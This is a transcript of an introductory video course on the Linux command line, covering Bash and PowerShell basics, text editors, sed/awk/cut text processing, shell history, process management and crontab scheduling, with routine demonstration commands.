Table of Contents
Objectives
discover the key concepts covered in this course
[Video description begins] Topic title: Course Overview. The host for this session is Steve Scott. He is an IT
Consultant. [Video description ends]
Hi, I'm Steve Scott. I've been a software developer and IT consultant for almost a quarter of a century. I've
traveled around the globe to serve clients, responsible for building software architectures, hiring development
teams, and solving complex problems through code. With my toolbox of languages, platforms, frameworks,
and APIs, I round out my coding experience with a formal background in mathematics and computer science
from Mount Allison University.
In this course, we're going to explore the navigation of a Linux command line environment and employ its
most common tools, including text editing and processing, file monitoring and comparison, and package
management. I'll start by examining the common properties of the command line environment, including the
bash shell and its properties and the features of the PowerShell environment. I'll then demonstrate how to
perform text editing using commands such as nano, vi, and ed, and text processing using commands such as
sed, awk, and cut. Next, I'll show how to perform repeat actions and use the bash shell history, as well as
perform process control tasks such as ps and kill. I'll then use the command line to schedule jobs, perform file
and command monitoring, and perform file comparison using the diff command. Lastly, I'll demonstrate how
to redirect the inputs and outputs of commands and files and perform package management tasks using the apt
command.
After completing this video, you will be able to describe the common features and properties of command-line
environments.
Objectives
[Video description begins] Topic title: Command Line Properties. The presenter is Steve Scott. [Video
description ends]
In this video, I'll describe some common features and properties of command-line environments.
The CLI is keyboard based. So commands are typed, and the resulting output is displayed as formatted text.
So instead of clicking on buttons and selecting from menus in a graphical user interface, we type commands. So
for a while a command-line interface was the primary way to operate modern computers. And it still is for
many computers that operate as servers. The command-line is always there under the hood in almost every PC
or desktop based computer. It's even there in most mobile devices, even though direct access is forbidden or
limited, or sometimes hidden from direct use. So in this particular image capture of a command-line interface,
I've run a command called ls with an option hyphen l. So the ls command is the list directory contents
command, and the -l option is long list format. So it shows the contents of the current folder in a list format
with various properties, including the file permissions, the user and group, the size, the date and time. And then
the object itself. In this case, they're highlighted in blue, desktop, documents, downloads, etc, because these are
all directories or sub folders. Now what are some of the common features?
Well, command-line environments, as I mentioned, are keyboard based. So we don't deal with images or graphics, and we don't interact with a mouse or a mouse cursor, so we're not clicking on things.
[Video description begins] Command line interface is text-driven. [Video description ends]
It's built around something called command processing. So we type the command, hit Enter, and the
command-line environment or shell processes commands that we type. We can automate with scripts. So
instead of typing the commands individually, we can type the commands into a file, and then run that file and
the commands get processed. And this is an alternative to a graphical user interface. Even if we're using a graphical user interface, a GUI, as our primary mode of computing, we can often open up what we call a terminal window inside of it. That gives us a command-line interface to perform our scripts and command processing, which in turn gives us access to the underlying operating system, the hard disks, network communications, and so on.
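As a minimal sketch of that idea, a script is nothing more than commands saved to a file and then run together; the file name here is just an example:

# contents of a plain text file called myscript.sh (hypothetical name)
date
ls -l

# run every command in the file, top to bottom:
bash myscript.sh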
So the command-line interface structure consists of a prompt. This usually has the username and host name, as well as the directory location that we're currently operating from. And it gives us a little cursor to
show readiness, so that we can actually type the commands. When we run a command, the prompt usually goes
away until the command finishes, and then we return to the prompt once our command-line is ready to process
new commands. Not only do we type commands, we also type arguments, which are parameters or options that
we supply to our commands. And most of our command-line environments have built-in help, either directly through the command itself by supplying a question mark, -h, or --help as an argument or option to the command. So we can discover what options we need to pass to a command to get it to do what we want.
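Here's a minimal sketch of that structure, using the ls command from the earlier example; the prompt shown is just an example:

steve@vm1:~/Documents$ ls -l /tmp    # command, an option, and a path argument
steve@vm1:~/Documents$ ls --help     # the command's built-in help
steve@vm1:~/Documents$ man ls        # the full manual page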
Now, our command-line interfaces are built around shells or shell scripts. A shell is just a command
language. So it gives us particular syntaxes, so that we can interact with our command-line environment.
They're often simple syntaxes at least when compared to general purpose programming languages. And we can
issue batches of commands. So we can string them together or compose them. So we can increase the
complexity and do more with a bunch of simple commands working together. And it gives us system access, like to the file system and various devices, including network communications.
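As a minimal sketch of composing simple commands, each one doing a single job and the pipe (|) stringing them together:

ls -l | grep "Documents"    # list the folder, then keep only the lines mentioning Documents
ls -l | wc -l               # list the folder, then count how many lines came out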
[Video description begins] Drawbacks [Video description ends]
Now what are some of the drawbacks of command-line interfaces? Well, they're often prone to errors, such as syntax and typing errors. So if we mistype something, it won't do what we want. It often has a steep learning curve, and it's harder to discover things. We can't just explore through menus or buttons like we can when we visually interact with a GUI application. There are some language limitations, that is, limitations of what we can do with the scripting language of the command interface. And it's not always portable. So scripts that we run on one system do not necessarily run on another. So if we write a script for a Windows operating system, it might not work with UNIX or Linux, or BSD, or Mac. So although these systems have some similarities, they're often not the same because the underlying operating systems and how we interact with them are different. And
that concludes this presentation on command-line properties.
After completing this video, you will be able to describe the command processing capabilities and environment
of the Bash shell.
Objectives
describe the command processing capabilities and environment of the Bash shell
[Video description begins] Topic title: Bash Properties. The presenter is Steve Scott. [Video description ends]
In this video, I'll describe the command processing capabilities and environment of the Bash Shell. So what is
the Bash shell? Well, it's a command language for a CLI, a command-line interface. It was written for the GNU project in 1989 by Brian Fox, and it's the default interactive shell for many, if not most, Linux distributions. It has programming features, such as variables, conditionals, and loops, so it can be used to write scripts for automating tasks. And it's also platform independent. So it's not only Linux that the Bash shell works on; it also runs on other UNIX distributions, as well as BSDs and even Microsoft Windows.
So what are some of the basic features of Bash scripting? Because it's a command language for a command-
line interface, for a CLI, Bash has printing and echoing output capabilities. For instance, using the echo
command or using the cat command to output the contents of a file. It can read user input, can use conditional
logic and loops, so if statements, if else statements, for loops and while loops, typical programming constructs.
So we can pass arguments or options to Bash scripts and we can manipulate string data. So we can get subsets
of strings, we can replace data in strings, and we can compare strings using Bash; there's a small sketch of these basics just below. So what are some other important features that set Bash apart?
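Before getting to those, here's a minimal sketch pulling the scripting basics above together; the file and variable names are just examples:

#!/bin/bash
# greet.sh - echoing output, reading input, a conditional, a loop, and simple string handling
read -p "What is your name? " name      # read user input into a variable
if [ -z "$name" ]; then                 # conditional: was anything entered?
  name="world"
fi
echo "Hello, ${name^}"                  # ${name^} capitalizes the first character (bash 4 and later)
echo "First argument: ${1:-none}"       # arguments passed to the script show up as $1, $2, and so on
for i in 1 2 3; do                      # a simple loop
  echo "Loop pass $i"
done

Running bash greet.sh then prompts for a name, prints a greeting, and prints three loop passes.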
Well it's configurable, so we can customize it and customize its behavior so that we can be more productive
with it based on our own needs. So this is important to know because the way you set up Bash in your own
environment, say on your own workstation or your own servers, might be different from how other people set
it up. So if you go from one Bash shell environment to another, be aware that some things could be configured
differently. It has command name and path completion. So if you start typing a command and you type half the
command in and press the Tab key, Bash will often complete the rest of the command name if it's the only
command by that name.
If there are several commands that start the same way, it'll show you a list of the matching command names. And the same goes for path completion. If you start typing the directory path to a file, including the file itself, and hit the Tab key, Bash can often complete the path, especially if it's a unique path.
Otherwise, again, it will show you various options if you hit the Tab key a few times. We have an interactive
command history. So we can run the history command, see what previous commands have been run. And we
have the ability to rerun commands using the history features of Bash.
We have regular expression and pattern matching built into Bash, so we can find particular strings within text
or do find and replaces based on regular expressions or simple pattern matching. And we have inter-process communication through pipes. So we can pipe one command into another, and into another, successively, taking the output of one program or script and feeding it into the next, which allows us to automate tasks by composing commands and scripts together. And Bash is portable, so there's portability between UNIX/Linux, macOS, and Windows.
Now, up until recently, Bash was the default in macOS, which has since been changed to the Z shell, or zsh. But Bash is still there, and you can set it to be your preferred shell instead of the default. Microsoft Windows also now supports running Bash as a shell environment. Most Linux distributions, as I mentioned previously, have Bash as the default shell. And on most UNIX systems in general, although they might use Z shell, or KornShell (ksh), or C shell, or other shell environments, the Bash shell is usually one of the options. And that concludes this
presentation on Bash properties.
After completing this video, you will be able to describe the features and capabilities of the PowerShell
environment.
Objectives
[Video description begins] Topic title: PowerShell Environment. The presenter is Steve Scott. [Video
description ends]
In this video, I'll describe the features and capabilities of the PowerShell environment.
So what are some of the important features? Well, it's a command-line shell. Commands are run interactively
from a command-line interface, with text-based input and output. We get a scripting language: PowerShell scripts and functions have typical language features such as variables, conditionals, and loops. And we get
system access with a direct connection to the .Net framework and its classes. So commands can use any .Net
API directly.
Now, PowerShell's design is centered around four main elements. Pipelines: this is an interprocess stream of outputs and inputs, so the output of one program can be the input to another through the pipeline operation, just as with UNIX, and it also uses the pipe operator. We get an application programming interface with the direct connection to .Net. PowerShell scripts can be created, typically using files with the .PS1 file extension. And we have what we call cmdlets. These are the commands, in the verb-noun pattern, that power the PowerShell environment.
So let's look at some PowerShell commands and their equivalents in UNIX or Linux, often found in bash and other shell programs. So some of the verb-noun cmdlets are Get-Content, Get-ChildItem, Set-Location, Copy-Item, Remove-Item, Move-Item, and Invoke-WebRequest. So these are some common
PowerShell commands. Now there are equivalents: Get-Content is equivalent to the cat command, and the cat command will output the contents of a file. The ls command lists the contents of the current folder, which we can do with Get-ChildItem in PowerShell. cd changes the directory, and that's accomplished through Set-Location. copy or cp is done through Copy-Item. del, rm, or rmdir will remove a file or directory, and in PowerShell we just need Remove-Item. For move or mv we use Move-Item, and Invoke-WebRequest is the equivalent of the command-line programs curl or wget. And that concludes this presentation on the PowerShell
environment.
[Video description begins] Topic title: Text Editing Basics. The presenter is Steve Scott. [Video description
ends]
In this video, I'll demonstrate how to perform command-line text editing with nano, Vi, and ed.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So we'll start with Ed. So it's just the letters e and d, which looks like ed but it's pronounced E-D, which is the
default UNIX editor. And this was released a long time ago, in 1973, and although it's not often used nowadays as an editor, it's best to think of it as a line editor written before computers had monitors. But it still comes up
in shell scripts for its ability to automate text editing actions and regular expressions. So it's not known for its
ease of use, quite the opposite. But knowing how it operates and a few basic commands is a good skill to have
if you're a system administrator, or if you're working with legacy Linux systems, or if you just want to impress
your UNIX friends. Ed also influenced the development of many other tools, including Vi, which I'll talk about
later in this video. So let's start with Ed and I'm going to type in a file name, a_tale_of_two_cities.
[Video description begins] He executes the following command: ed a_tale_of_two_cities. The window prompts
that there is no such file or directory. [Video description ends]
So it tells me that there's no such file or directory. But in this case, we're going to create this file. Now when
we start ed, we start in what's called command mode. So we can't just start typing text to add to the file, we
need to issue a command first. So I issue the a command, for append. Now we can start typing. So now we're
in input mode. So it was the best of times, Enter. It was the worst of times, Enter. And now to get out of this
input mode, we just put a period on its own line and it will exit input mode. And now we can issue other
commands. So I can issue w for write and q for quit.
[Video description begins] He executes the following command: w. The output reads: 53. He executes the
following command: q. No output displays and the prompt remains the same. [Video description ends]
And now if I look in the current directory, there's a file called a_tale_of_two_cities.
[Video description begins] He executes the following command: ls. The output reads:
a_tale_of_two_cities. [Video description ends]
If I use the cat command, a_tale_of_two_cities, it shows me the contents of the file.
[Video description begins] He executes the following command: cat a_tale_of_two_cities. The output displays
the content of the given filename. [Video description ends]
If I run ed on a tale of two cities again, it tells me how many bytes were loaded when it loads up, so it shows
53.
[Video description begins] He executes the following command: ed a_tale_of_two_cities. The output reads:
53. [Video description ends]
And if I type a, I can append some more text to this. And I can type it was the age of wisdom, Enter. A period
to get out of the append mode, and now I type q to quit, but it gives me a question mark. Well, if it shows this,
it means that some type of error or a warning occurred. So if I hit h or the h command, it tells me warning
buffer modified, which means we made a change to the file, but we didn't actually save the changes. So I need
to issue a w command first and I can actually combine that with the quit. So w and q together, which will write
the file and quit.
[Video description begins] He executes the following command: wq. The output reads 79. [Video description
ends]
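Incidentally, because ed reads its commands from standard input, this whole sequence can be scripted, which is part of why ed still shows up in shell scripts. A minimal sketch, reusing the file from this demo (the appended line is just example text):

ed a_tale_of_two_cities <<'EOF'
a
it was the epoch of belief,
.
wq
EOF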
So remember anytime you see a question mark, there's a warning or an error, and you can use h to see what
that was. And then it tells me when I write and quit that the file now contains 79 bytes. Now let's move on to
another editor called nano. So I can type nano a_tale_of_two_cities.
[Video description begins] He executes the following command: nano a_tale_of_two_cities. The GNU nano
2.9.3 editor opens. The a_tale_of_two_cities file is open. [Video description ends]
And it will open up this file in this editor, the GNU nano editor. So this is an open source editor available on most, if not all, Linux operating systems and most UNIX systems. So it's an interactive command-line text editor and not a line editor like ed. Nano uses Ctrl and meta keys to control operation. And in my opinion, it's one of the easiest to get up and running with on the command-line without worrying about modes of operation. And
we can use the arrow keys to move up and down and through the file or the PgUp and PgDn or the End and
Home keys to navigate. We can also use the keyboard using Ctrl + F to go forward on the line and Ctrl + B to
go backwards. So you can keep your hands on the keys and not move them over to the arrow keys for a more
efficient operation. And Ctrl + N goes to the next line, and Ctrl + P goes up a line, so to the previous line. Ctrl + O is the write out command, so the save command, and it asks me to save the file. And Ctrl + X exits nano and gets out of it.
[Video description begins] He switches to the Terminal window. [Video description ends]
So if you know some of the basic commands, especially Ctrl + X to exit and Ctrl + O to save, you can get up and running with nano quite easily. Now another editor that comes up and is still used quite often is Vi. And
on Linux in the command-line, if I type Vi, it opens VIM, which is Vi improved, which is a modern version of
Vi.
[Video description begins] He executes the following command: vi. The VIM editor opens. [Video description
ends]
And the nice thing about this, it gives me some basic commands that I can use. Now the first time I used Vi
having never experienced anything like it, I had no idea what I was in for. So after launching Vi, I had no idea
how to exit the program. I didn't even know how to insert or append text. And I had no idea about command
mode or insert mode. So with Vi if I type :q, it quits Vi.
[Video description begins] He executes the following command: :q. He switches to the Terminal
window. [Video description ends]
Now we can navigate within the file using J and K to move down and up, and H and L to move back and
forward on the line. So you can navigate with your fingers on the home row and then if I want to add, I can go
to the end of the file and type the A key which will append. And I can start typing. It was the age of
foolishness, but I'm in input mode. How do I get back into command mode? Well, it's not like ed, where I put a period on its own line. I actually just hit the Esc key, and that brings me back into command mode. And if
I type colon, I can type q to quit. But it gives me an error at the bottom saying, No write since last change, add
exclamation mark to override. So this is like trying to quit while the file was modified. If I wanted to write it, I
type colon, and then w to write, and then q to quit. And so I can combine them with wq and it writes and saves
the file.
[Video description begins] He executes the following command: wq. He switches to the Terminal
window. [Video description ends]
So Vi was heavily influenced by ed, but it's also a lot like Nano in how it interactively edits. So it's a
combination of an interactive editor and a line editor with command and input mode. But as far as command-
line text editing goes, having the basics of Nano, Ed, and Vi in your toolbox is enough to get you started
regardless of the editor you choose for yourself. And that concludes this demonstration of command-line text
editing basics.
In this video, you will perform basic text processing with sed, awk, and cut, and describe the differences
between them.
Objectives
perform basic text processing with sed, awk, and cut, and describe their differences
[Video description begins] Topic title: Text Processing. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to perform basic text processing, so that you can recognize how commands
and scripts are written using sed, awk and cut.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~$. [Video description ends]
So we'll start with the sed command, which stands for stream editor. This is for processing string data or text files. This is done primarily through pattern matching, find and replace, and using regular expressions. So we carry out replacing, deleting, and filtering on text data. So I'll start by going into my Documents folder.
[Video description begins] He executes the following command: cd Documents/. The following prompt is
displayed: steve@vm1:~/Documents$. [Video description ends]
And in this folder I have a file called a tale of two cities, which has the first few lines of the novel A Tale of
Two Cities by Charles Dickens, so I use cat to output the contents, so that we can see what we're working with.
[Video description begins] He executes the following command: cat a_tale_of_two_cities. The output displays
the content of the given filename. [Video description ends]
So it gives us the text of the first four lines, it was the best of times, it was the worst of times. It was the age of
wisdom, it was the age of foolishness, and then it stops there. So let's start with our first sed example. I type sed and then, in single quotes, I put s for substitute, then a slash, and I'm going to replace foolish. So I type foolish/ and then what I want to replace it with, so I type crazi/, and then I close the quote. So this will replace the occurrence of foolish with crazi. So instead of foolishness, it will say craziness. And then I give it the file name.
[Video description begins] He executes the following command: sed 's/foolish/crazi/' a_tale_of_two_cities. The
output displays the content of the a_tale_of_two_cities file where foolishness is replaced with
craziness. [Video description ends]
So we get the output with it was the age of craziness as the last line. But if we look at the contents of the file
again, you'll notice nothing has changed.
[Video description begins] He executes the following command: cat a_tale_of_two_cities. The output displays
the original content of the a_tale_of_two_cities file. [Video description ends]
So it's not editing the file destructively. It's just changing the text and redirecting it to the standard output. So
let's try another thing. Let's replace the first character. Instead of having lowercase i's for "it" on the last three lines, let's change them to uppercase. So I start with sed 's/^./. This matches the first character of each line, since ^ anchors to the start of the line and . matches any single character. Then I do \U to uppercase, and because I want to keep the matched character, I put an & followed by /. So it looks a bit more verbose, but it's saying: take the first character and replace it with its uppercase equivalent. And then I put in a_tale_of_two_cities.
[Video description begins] He executes the following command: sed 's/^./\U&/' a_tale_of_two_cities. The
output displays the content of the a_tale_of_two_cities file where in the last three lines the lowercase "i" in the
word "it" has been replaced by uppercase "I". [Video description ends]
All the i's in "it" have now been converted to uppercase, although it hasn't changed the file. Now I'm going to arrow up and go back through the text. Instead of having just the uppercase change, I want to make them sentences, so I'll remove the commas and put in periods. So I can use -e. I give it the expression, the same expression I had previously to replace the first character with uppercase, and then another -e. And now I'm going to do a substitution. So in single quotes, I have 's/,/./'. So this will replace the first comma on each line with a period.
[Video description begins] He executes the following command: sed -e 's/^./\U&/' -e 's/,/./'
a_tale_of_two_cities. The output displays the content of the a_tale_of_two_cities file where the commas at end
of each line are replaced with periods. [Video description ends]
And now we have four sentences instead of having it in the poetic fashion with commas and lowercase i's.
Now, if we want more information on how to use sed, we can always use the man command for the manual of sed, and it gives the details, the description, and the options for sed. So I'll quit, and now we'll move on to awk.
[Video description begins] He executes the following command: man sed. The manual page of sed command
opens. [Video description ends]
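One quick note before awk: by default, sed only writes the transformed text to standard output, but GNU sed can also edit the file in place with the -i option. A minimal sketch, reusing the earlier substitution:

sed -i.bak 's/foolish/crazi/' a_tale_of_two_cities   # edits the file, keeping the original as a_tale_of_two_cities.bak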
Now awk can be seen as complementary to sed, but we think of it as a text processing language for extracting
and filtering data.
[Video description begins] He switches to the Terminal window. [Video description ends]
So, to show what I'm going to extract: if I do an ls -l, it'll give me the contents of the current folder in long list format.
[Video description begins] He executes the following command: ls -l. The output lists the files and directories
in long listing format. [Video description ends]
Now if I want to extract only a portion of it, let's say the file permissions at the beginning and the file names at the end, I can put a pipe after ls -l and then awk, so we're piping the output into awk. And then, in single quotes, I put a brace, followed by print $1, $9, then I close the brace and close the quote.
[Video description begins] He executes the following command: ls -l | awk '{ print $1, $9 }'. The output
displays the permissions and the names of the files and directories. [Video description ends]
And now I just get the first field and the ninth field. So I get the file permissions and I get the files themselves. So awk uses the spaces in between to determine where to delimit the fields, and then it extracts the first and ninth.
Now we can use different delimiters for awk. Not just spaces or tabs or any whitespace; we can use particular characters like commas, semicolons, and colons. And I'm going to do that right now on the password
file. So I'll do cat /etc/passwd, and you'll notice all this information about users and their shells and their logins
and their groups etc are delimited by colons.
[Video description begins] He executes the following command: cat /etc/passwd. The output displays the
system's account, giving for each account some useful information such as user ID, group ID, home directory,
and shell. [Video description ends]
So I run awk with -F for the field separator and give it ':'. Then, after a space, comes the awk command itself. So in single quotes again, I open a brace, do a print $1, and then close the brace and close the quote. And I do that on the file /etc/passwd. And of course it doesn't modify it.
[Video description begins] He executes the following command: awk -F':' '{print $1}' /etc/passwd. The output
lists the usernames of the /etc/passwd file. [Video description ends]
It just processes the text and prints the output. So here I get the first field, which has all the usernames included in the passwd file. And now the last command is cut, which just cuts lines of text into parts or pieces. So if I do something similar to what I did before with ls -l, to get the contents of the directory in this format, I can give it a pipe and pipe it into cut.
[Video description begins] He executes the following command: ls -l. The output lists the files and directories
in long listing format. [Video description ends]
And now let's say I want to extract a certain number of characters. So I use the -c option, and I'm going to give it -7.
[Video description begins] He executes the following command: ls -l | cut -c -7. The output displays the first
seven characters from each line of the list of files and directories in long listing format. [Video description
ends]
So what this does is give us the first seven characters from each line.
[Video description begins] He executes the following command: ls -l | cut -c 7. The output displays the seventh
character of each line of the list of files and directories in long listing format. [Video description ends]
Now if I do cut -c 7, it gives us just the seventh character from each line. So it counts out to the seventh character and prints only that one, not everything up to that point. But we can also operate on fields. So I'll replace this command with cut -f 3.
[Video description begins] He executes the following command: ls -l | cut -f 3. The output lists the files and
directories in long listing format. [Video description ends]
The default delimiter for cut is the tab character when you give it the -f option. So we need to specify a -d option with a space as its argument.
[Video description begins] He executes the following command: ls -l | cut -f 3 -d' '. The output displays the
third field, which is username from the list of files and directories in long listing format. [Video description
ends]
So in this case, it delimits on the space, and it gives me the third field, which is the username field, and I get steve.
Now there's one more action I'd like to carry out, and this is the same action we did before, extracting the first field. So if I do a cut -d with the delimiter being the colon, then -f 1 /etc/passwd, so the password file, it gives the same result as the last awk command we ran.
[Video description begins] He executes the following command: cut -d':' -f 1 /etc/passwd. The output displays
all the usernames of the /etc/passwd file. [Video description ends]
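In fact, these tools are often chained together in a single pipeline. A minimal sketch (the field and pattern choices here are just for illustration):

# keep the username and shell fields from /etc/passwd, then uppercase the leading username
cut -d':' -f1,7 /etc/passwd | awk -F':' '{print $1, $2}' | sed 's/^[a-z]*/\U&/'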
So there can be some overlap in these tools, but they're also used together in a complementary way. And that
concludes this demonstration of text processing.
repeat actions and view the command-line history using the bash history command
[Video description begins] Topic title: Bash History. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to repeat actions using the command line utility history.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So this is using the bash history command. So if I type history into my command line environment, I get a list
of all the recent commands.
[Video description begins] He executes the following command: history. The output lists all the executed
command. [Video description ends]
We have 743 commands returned. So that's a lot to look through. If we'd like to look for a particular command, we can pipe history into grep, which we can use to search for particular expressions or names. So if I'd like to get all of the occurrences of sed, I type history | grep "sed" and it will return all of the occurrences of sed.
[Video description begins] He executes the following command: history | grep "sed". The output displays a list
of all the executed commands which includes sed. [Video description ends]
If I type history | grep "curl", I'll see all the times that curl was run.
[Video description begins] He executes the following command: history | grep "curl". The output displays a
list of all the executed commands which includes curl. [Video description ends]
If I just like to see the last five commands, I can type history | tail -n 5. This will show me the last five.
[Video description begins] He executes the following command: history | tail -n 5. The output displays the last
five executed commands. [Video description ends]
If I'd like to execute the last command, I can type a double exclamation mark that will execute the last
command, the most recent command from the history. I can also execute commands by number.
[Video description begins] He executes the following command: !!. It executes the last command. The output
of the last command is displayed. [Video description ends]
So I'll do history | grep, and I'll pass awk into grep. And I'll retype that because I spelled history wrong.
[Video description begins] He executes the following command: history | grep "awk". The output displays a
list of all the executed commands which includes awk. [Video description ends]
So I can see all the commands that were used to run awk.
[Video description begins] In the output, he points to the line number 734. It contains awk -F':' '{print $1}'
/etc/passwd. [Video description ends]
So in this case, I'm going to run number 734 from history if I type !734, it runs the command.
[Video description begins] He executes the following command: !734. It executes the command on the line
number 734. The output displays a list of usernames of the /etc/passwd file. [Video description ends]
Now if I just like to see the command, I can type !734:p and it just shows what the command was.
[Video description begins] He executes the following command: !734:p. The output reads: awk -F':' '{print
$1}' /etc/passwd. [Video description ends]
And I can do the same thing with the !!:p, it will show the last command that was run which in this case, it's
the same.
[Video description begins] He executes the following command: !!:p. The output reads: awk -F':' '{print
$1}' /etc/passwd. [Video description ends]
Now at some point, we may want to clear the history. So in that case, we can type history -c, and that will clear
the history.
[Video description begins] He executes the following command: history -c. No output displays and the prompt
remains the same. [Video description ends]
[Video description begins] He executes the following command: history. The output lists all the executed
command. [Video description ends]
The only command in the history is actually running the history command itself. I can also use man history to bring up the history manual page.
[Video description begins] He executes the following command: man history. The manual page of history
command opens. [Video description ends]
So if I scroll down, it gives all the different options we can use when running the history command.
[Video description begins] He switches to the Terminal window. [Video description ends]
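One last note on history: how much it remembers is controlled by a few shell variables, usually set in ~/.bashrc. A minimal sketch (the values shown are common choices, not requirements):

HISTSIZE=1000           # number of commands kept in memory for the current session
HISTFILESIZE=2000       # number of lines kept in the history file, ~/.bash_history
HISTCONTROL=ignoredups  # don't record a command that repeats the previous one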
[Video description begins] Topic title: Process Management. The presenter is Steve Scott. [Video description
ends]
In this video, I'll demonstrate how to perform process control tasks, including ps and kill, as well as some related commands.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So our computers run many processes concurrently. Many run in the background, in memory, where we can't see them, and other programs run in the foreground, ones that we can interact with. Quite often we need to know what is running, including background processes, especially if our computers are slowing down. And if some processes occupy too many resources, then we need to close them. So to discover what's happening, we turn to the ps command, which stands for process status. So if I run
ps, it will return the processes for the current shell.
[Video description begins] He executes the following command: ps. The output displays processes of the
current shell. [Video description ends]
I'm running bash and ps, the command I executed. If I want to see every process, I do ps -e, so I give it the -e option. And it shows me everything.
[Video description begins] He executes the following command: ps -e. The output displays all the processes
and the related information. [Video description ends]
Now it's in a minimal format here, I can get more information if I do ps -ef.
[Video description begins] He executes the following command: ps -ef. The output displays all the processes
and the related information in full format. [Video description ends]
So this gives me the full format. And there's a lot of information going on here, including who the process belongs to. In this case, we see steve and root down the left hand side. There's also its process ID, what time it was started, and the program name. Now since there's too much to see on a single screen, there's a handy way to step through it page by page. So if we do ps -ef, and we pipe that into the less command, it shows the entire contents.
[Video description begins] He executes the following command: ps -ef | less. The output displays all the
processes and the related information in full format page by page. [Video description ends]
So the first page, if we hit the space bar it steps through it page by page until we reach the end of the processes.
So that's how we can see all of them, but there's a lot to go through, and a lot of these processes we don't care
too much about. So we can also do ps -ef | grep. So let's say we want to grep for bash.
[Video description begins] He executes the following command: ps -ef | grep "bash". The output displays the
process information of the bash shell. [Video description ends]
It actually returns the process information for the bash shell. If we want to see processes displayed in real time
where we can see the actual resource use, we can use the top command.
[Video description begins] He executes the following command: top. The output displays the dynamic real-
time view of the running system. [Video description ends]
And it actually gives us a full screen view into our current system and all of the processes that are running, putting the ones that are using the most CPU at the top of the list. It shows the memory for the system, the CPUs for the system, the number of tasks, the number running, sleeping, and so on. So there's a lot of information here that we can see in real time. But often what happens is, if there's a process that's using a lot of CPU and
memory, it gets pinned to the top of this list. So you can see processes that are using too many resources. So
I'll type q to get out of the top command. And I'm going to open another terminal window.
[Video description begins] Another Terminal window opens. The following prompt is displayed:
steve@vm1:~$. [Video description ends]
So I open this additional terminal window, and I'll move it to the side. And I'm going to use the ping command
because it will keep pinging a particular address that I specify. So ping sends a little request to another computer over the network. And that computer will respond, saying I got your ping request. So it's kind of like ping pong.
[Video description begins] He executes the following command: ping 192.168.2.1. The ping command displays
how long it took to transmit that data and get a response. [Video description ends]
So it's pinging and receiving responses, showing how long it takes to respond. So I'll let this go and switch back to our main terminal window. And now I'm going to do ps -ef | grep "ping".
[Video description begins] He executes the following command: ps -ef | grep "ping". The output displays the
process information of ping. [Video description ends]
And it shows that ping is running and how it's being run. So ping of 192.168.2.1. Now, there are process IDs here. But what I'm going to do is use the pgrep command, and I'm going to give it ping.
[Video description begins] He executes the following command: pgrep "ping". The output displays process ID
of ping. [Video description ends]
So it actually shows just the process ID. So pgrep, which is process grep, returns the process ID for the ping process, which matches up with our list from the ps command. So I can do kill 3634 and it will kill the
process.
[Video description begins] He executes the following command: kill 3634. No output displays and the prompt
remains the same. [Video description ends]
And you'll see that this process was terminated in the other terminal window.
[Video description begins] He switches to the second Terminal window. The window prompts:
Terminated. [Video description ends]
So that's one way of stopping a process. Now, I'll run ping again.
[Video description begins] He executes the following command: ping 192.168.2.1. The ping command displays
how long it took to transmit that data and get a response. He switches to the first Terminal window. [Video
description ends]
But this time, it's going to be running under a different process ID. Each time a program is started, it gets a
new process ID. So I'll do pgrep "ping" and this time it's 3638.
[Video description begins] He executes the following command: pgrep "ping". The output displays process ID
of ping. [Video description ends]
Now let's suppose the process has stopped responding. It's gotten into a state where it's unresponsive, so we can't do anything to close it. And it won't close if we execute a normal kill command. There's actually a hard kill, a terminate option, which is -9, which says stop this process in the worst possible way. We just want it to stop. So don't give it time to shut down gracefully, just kill it.
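Under the hood, kill works by sending signals: a plain kill sends SIGTERM, signal 15, which asks the process to shut down cleanly, while -9 sends SIGKILL, which the process cannot catch or ignore. A minimal sketch, using the process ID from this demo:

kill 3638       # send SIGTERM (15): please shut down
kill -9 3638    # send SIGKILL (9): terminate immediately, no cleanup
kill -l         # list all available signal names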
[Video description begins] He executes the following command: kill -9 3638. No output displays and the
prompt remains the same. He switches to the second Terminal window. The window prompts: Killed. [Video
description ends]
And if I go over, instead of showing terminated, it shows Killed. So we abruptly ended it. Now I'll run it one
last time. Now there's another way we can stop a process using pkill.
[Video description begins] He executes the following command: ping 192.168.2.1. The ping command displays
how long it took to transmit that data and get a response. He switches to the first Terminal window. [Video
description ends]
So pkill also takes the same parameters. We can do pkill -9, or just pkill, and give it the actual process name, in this case ping.
[Video description begins] He executes the following command: pkill ping. No output displays and the prompt
remains the same. [Video description ends]
[Video description begins] He switches to the second Terminal window. The window prompts:
Terminated. [Video description ends]
So if we look in our other terminal window, the ping process has been terminated again. And that concludes
this demonstration of Process Management.
During this video, you will learn how to schedule the execution of tasks using a crontab.
Objectives
[Video description begins] Topic title: Scheduled Jobs. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to schedule execution of tasks using a crontab.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So the problem here is simple enough. On many systems, including personal computers and servers, we need
to run tasks periodically, often on an hourly, daily, or weekly schedule at a particular time of day or night. The
cron or crontab does just that. So to see what the current user has running as scheduled jobs, we run crontab -l.
[Video description begins] He executes the following command: crontab -l. The output reads: no crontab for
Steve. [Video description ends]
And now it says there's no crontab for steve. So we need to create one. So we can do crontab -e to edit the
crontab.
[Video description begins] He executes the following command: crontab -e. The GNU nano 2.9.3 editor opens.
A text file is open. [Video description ends]
So it's going to edit this text file, this configuration for a crontab, using nano. So I'll go down to the bottom of
this file, and now the format for a crontab is quite particular. What you specify is the minute, the hour, the day of the month, the month, and the day of the week that you want a particular command, or job, or script to run. In this case, I'm just going to run the touch command, which will create a file if it doesn't exist. And if it does exist, it'll update its date/time stamp. So we'll do /home/steve/Documents/hello_from_crontab. So this file does not currently exist, but once I install the crontab, it will run this command every minute.
[Video description begins] He enters the following command: 30 2 * * 0 ls. [Video description ends]
So now I'll write out and save this file, and exit.
[Video description begins] He switches to the Terminal window. The window prompts: no crontab for steve -
using an empty one crontab: installing new crontab. [Video description ends]
[Video description begins] He executes the following command: ls. The output lists files and
directories. [Video description ends]
